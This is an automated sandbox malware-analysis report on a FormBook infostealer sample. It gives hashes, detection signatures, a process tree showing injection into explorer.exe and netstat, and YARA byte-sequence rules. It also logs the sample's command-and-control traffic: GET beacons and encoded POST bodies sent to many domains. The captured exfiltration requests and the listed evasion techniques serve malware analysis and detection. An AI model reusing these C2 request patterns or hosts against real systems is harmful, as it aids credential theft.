Loading ...

Play interactive tourEdit tour

Analysis Report mp0nMsMroT.exe

Overview

General Information

Sample Name:mp0nMsMroT.exe
Analysis ID:286180
MD5:26a5cbbf551c2a810792aad03ed4d51b
SHA1:b509a59df8bcbb441cb8f527c920a37e49521098
SHA256:af164cd974521a1577be7c68ed0babe78e59f94ae13f79777f8565cef148c09f

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • mp0nMsMroT.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
    • mp0nMsMroT.exe (PID: 6732 cmdline: 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: 26A5CBBF551C2A810792AAD03ED4D51B)
      • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4608 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5556 cmdline: /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
    • 0x160fc:$sqlite3step: 68 34 1C 7B E1
    • 0x16018:$sqlite3text: 68 38 2A 90 C5
    • 0x1613d:$sqlite3text: 68 38 2A 90 C5
    • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.mp0nMsMroT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.mp0nMsMroT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x918a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9f02:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18f07:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19f7a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.mp0nMsMroT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15fe9:$sqlite3step: 68 34 1C 7B E1
        • 0x160fc:$sqlite3step: 68 34 1C 7B E1
        • 0x16018:$sqlite3text: 68 38 2A 90 C5
        • 0x1613d:$sqlite3text: 68 38 2A 90 C5
        • 0x1602b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16153:$sqlite3blob: 68 53 D8 7F 8C
        1.2.mp0nMsMroT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.mp0nMsMroT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x838a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18107:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1917a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: mp0nMsMroT.exeVirustotal: Detection: 47%Perma Link
          Source: mp0nMsMroT.exeReversingLabs: Detection: 79%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: mp0nMsMroT.exeJoe Sandbox ML: detected
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00408454 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00405098 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D7F470 FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49726
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49732
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49738
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.98.99.30:80 -> 192.168.2.5:49744
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49750
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49752
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.196.13.28 34.196.13.28
          Source: Joe Sandbox ViewIP Address: 34.196.13.28 34.196.13.28
          Source: Joe Sandbox ViewIP Address: 64.98.145.30 64.98.145.30
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: TUCOWS-3CA TUCOWS-3CA
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.bestselfietools.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.bestselfietools.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bestselfietools.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 41 73 59 74 6c 2d 66 2d 77 4b 55 42 4a 4b 33 49 30 72 51 6a 30 57 75 48 41 55 44 72 71 53 75 31 6e 43 28 46 69 77 49 50 47 76 72 4d 6d 6e 4c 76 58 4b 71 5a 69 35 28 57 42 75 77 2d 6c 76 78 63 68 75 49 32 59 42 63 68 30 43 52 45 39 45 34 70 47 36 75 6a 51 31 6a 49 67 7a 4f 7a 64 65 52 6b 30 44 56 6a 74 4a 48 36 33 2d 6f 74 45 31 34 4b 6f 73 34 5f 70 30 73 48 57 49 7a 49 6d 61 75 4f 55 54 62 6b 31 4f 6a 43 6a 58 78 6e 6c 76 69 4c 69 44 71 4d 7e 7a 64 4c 28 4a 44 79 64 72 51 4f 72 55 38 50 62 36 74 53 31 41 78 59 53 79 78 34 50 48 37 47 7a 41 6e 68 78 67 63 51 32 57 6f 64 6f 75 37 7a 35 45 36 70 33 52 28 6f 79 36 67 65 49 64 50 2d 46 69 62 4d 51 30 6e 30 63 77 34 65 5a 46 50 63 4c 4e 45 58 69 6c 67 42 73 71 4f 71 34 36 30 6c 59 39 72 36 6c 5a 6b 73 45 50 50 63 6a 31 37 43 4e 6f 70 39 4f 45 55 72 39 71 48 42 35 32 74 68 45 36 75 38 45 65 5a 61 63 30 69 6d 46 35 43 46 49 69 59 79 6d 50 69 64 37 59 43 7a 66 6c 78 4e 75 46 33 68 78 44 68 54 33 73 4f 42 6e 4e 61 44 41 43 71 37 4f 48 39 36 4c 77 62 53 35 66 74 55 6c 69 71 63 51 59 50 32 6f 42 28 76 72 79 77 74 48 44 36 45 63 6d 4c 7a 6d 79 6f 6b 42 57 75 79 46 37 61 73 6e 45 39 5f 5a 6d 7e 62 4f 57 5a 67 35 45 4f 75 6f 62 5a 55 30 44 31 52 67 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=AsYtl-f-wKUBJK3I0rQj0WuHAUDrqSu1nC(FiwIPGvrMmnLvXKqZi5(WBuw-lvxchuI2YBch0CRE9E4pG6ujQ1jIgzOzdeRk0DVjtJH63-otE14Kos4_p0sHWIzImauOUTbk1OjCjXxnlviLiDqM~zdL(JDydrQOrU8Pb6tS1AxYSyx4PH7GzAnhxgcQ2Wodou7z5E6p3R(oy6geIdP-FibMQ0n0cw4eZFPcLNEXilgBsqOq460lY9r6lZksEPPcj17CNop9OEUr9qHB52thE6u8EeZac0imF5CFIiYymPid7YCzflxNuF3hxDhT3sOBnNaDACq7OH96LwbS5ftUliqcQYP2oB(vrywtHD6EcmLzmyokBWuyF7asnE9_Zm~bOWZg5EOuobZU0D1RgQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.homecaredispatch.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.homecaredispatch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.homecaredispatch.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 46 6c 6e 35 2d 47 4c 4d 4d 47 46 7e 67 33 5a 41 69 77 33 39 2d 4c 63 4d 5a 55 58 68 33 42 69 39 6d 61 79 63 74 52 6f 56 4d 49 72 52 4c 77 6a 6f 44 76 48 6d 34 36 39 59 44 7a 4f 30 4a 36 41 49 49 35 72 6b 4d 32 69 46 45 52 52 65 6e 77 39 78 74 56 49 44 54 41 6d 30 4d 78 47 77 4b 6e 48 58 6d 55 4d 72 75 4f 6a 30 41 34 33 35 57 72 63 6c 30 46 49 49 39 30 4a 45 59 34 75 4a 53 69 67 39 57 6e 42 33 50 77 46 32 79 6c 58 51 4a 4c 62 65 77 49 32 33 33 51 59 4b 65 4f 6c 7a 36 7e 31 4c 78 38 56 6a 6a 30 43 78 72 6b 5f 42 36 30 56 6f 64 68 5f 56 52 71 39 6b 73 54 49 64 4a 74 65 6b 4f 7a 34 70 46 68 73 77 33 53 52 75 69 6a 79 28 67 36 72 6f 36 69 4a 7a 45 31 78 77 6a 67 63 4b 71 79 6c 6d 41 38 6e 36 56 78 65 6e 64 7e 4b 71 51 61 39 43 61 38 6d 77 30 49 55 55 39 51 43 6c 59 51 50 62 5f 62 51 34 36 71 54 4b 46 48 75 54 73 71 5f 31 6a 53 67 4b 42 71 49 59 57 42 64 71 34 58 54 31 70 58 4a 44 77 32 55 31 43 52 6c 47 32 51 30 59 6b 43 43 4e 2d 58 77 50 76 54 6d 78 6b 35 64 4e 63 79 5a 28 6a 4f 68 52 4b 4d 58 7e 4a 41 76 73 49 72 36 59 74 49 5a 6f 2d 63 71 7e 76 36 42 6a 43 45 74 69 73 44 71 6f 5a 49 67 77 72 43 6d 4c 51 5a 4d 7e 6f 72 63 4e 42 6d 6c 7e 2d 54 62 72 54 67 44 6b 2d 74 35 57 69 78 43 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=7Fln5-GLMMGF~g3ZAiw39-LcMZUXh3Bi9mayctRoVMIrRLwjoDvHm469YDzO0J6AII5rkM2iFERRenw9xtVIDTAm0MxGwKnHXmUMruOj0A435Wrcl0FII90JEY4uJSig9WnB3PwF2ylXQJLbewI233QYKeOlz6~1Lx8Vjj0Cxrk_B60Vodh_VRq9ksTIdJtekOz4pFhsw3SRuijy(g6ro6iJzE1xwjgcKqylmA8n6Vxend~KqQa9Ca8mw0IUU9QClYQPb_bQ46qTKFHuTsq_1jSgKBqIYWBdq4XT1pXJDw2U1CRlG2Q0YkCCN-XwPvTmxk5dNcyZ(jOhRKMX~JAvsIr6YtIZo-cq~v6BjCEtisDqoZIgwrCmLQZM~orcNBml~-TbrTgDk-t5WixCmQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.netrworksoultions.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.netrworksoultions.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.netrworksoultions.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 79 4e 6f 53 68 67 6a 6f 69 77 55 4a 44 36 31 6b 55 79 5f 39 74 37 67 62 77 55 4e 37 36 74 62 45 6b 71 78 70 4d 7e 53 68 32 47 67 6a 34 67 66 55 4e 44 49 72 48 77 64 67 71 66 4c 71 2d 31 62 4a 30 68 36 56 76 50 51 59 44 38 48 42 32 6f 51 41 52 74 58 67 48 43 4a 54 71 75 68 71 35 7a 4f 4e 42 59 54 76 50 75 35 74 4f 58 54 6c 35 65 35 33 44 58 62 65 58 30 51 79 4f 55 49 4e 6e 6a 39 28 53 73 4c 70 59 35 56 74 67 6d 4a 79 4f 51 75 70 6a 6c 5a 65 37 6e 47 49 37 63 41 61 55 6a 5f 28 4d 49 75 41 44 4e 6d 6e 47 4f 6c 4e 61 64 77 6c 55 6e 36 7e 7a 28 2d 38 46 67 65 61 78 72 75 52 72 4a 6f 48 39 65 6f 47 44 61 55 6f 75 38 64 72 6b 73 42 51 4f 4b 6c 6c 50 30 32 4b 35 6e 6f 78 72 65 4a 73 6a 6f 50 64 42 68 75 47 5f 6f 50 30 42 69 46 4b 78 4d 31 74 36 7e 50 45 6c 35 44 35 50 53 44 39 52 75 55 56 6c 51 33 35 57 6e 4b 74 2d 31 57 74 58 65 6f 58 59 6b 7a 39 47 79 44 34 2d 41 53 43 61 44 5f 35 35 79 76 42 6c 37 79 74 59 39 47 7e 2d 5a 4f 4e 76 61 50 4e 74 77 74 47 2d 63 6d 6d 30 6a 37 7a 72 35 76 7e 39 6d 4f 36 4b 6a 69 39 37 4d 77 4e 49 64 72 65 51 35 64 66 41 59 74 50 67 63 4c 57 61 7e 66 43 6d 4b 77 65 63 28 31 62 6f 6f 68 56 5a 66 47 6b 51 70 71 64 52 55 57 30 58 64 4c 51 39 54 